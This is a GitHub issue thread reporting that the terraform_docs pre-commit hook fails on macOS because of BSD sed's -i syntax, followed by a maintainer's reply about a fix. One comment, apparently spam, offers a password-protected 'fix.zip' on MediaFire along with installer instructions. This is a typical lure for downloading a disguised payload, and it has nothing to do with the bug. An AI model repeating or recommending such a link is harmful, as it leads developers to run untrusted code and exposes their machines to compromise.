### ISSUE TITLE
`terraform_docs`fails with invalid command code R

### ISSUE THREAD

**Issue by cschroer** [antonbabenko/pre-commit-terraform#703]
### Describe the bug

In PR #701, the usage of `sed` was introduced to the `terraform_docs` for in-file changes.

MacOS requires an extension for the `-i` parameter, unlike GNU sed.
As a result the hook fails on MacOS know with the following error:

```shell
Terraform docs..........................................................................Failed
- hook id: terraform_docs
- exit code: 1

sed: 1: "README.md": invalid command code R
```

### How can we reproduce it?

Use MacOS to run the `terraform_docs` hook.

### Environment information

* OS: MacOS
* Darwin MB-PRO.local 23.6.0 Darwin Kernel Version 23.6.0: Mon Jul 29 21:13:04 PDT 2024; root:xnu-10063.141.2~1/RELEASE_ARM64_T6020 arm64

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yermulnik** [comment]
@cschroer Thanks for catching this. I requested changes PR of yours (#704) to simplify solution and make it "compatible" on both GNU and POSIX `sed`.
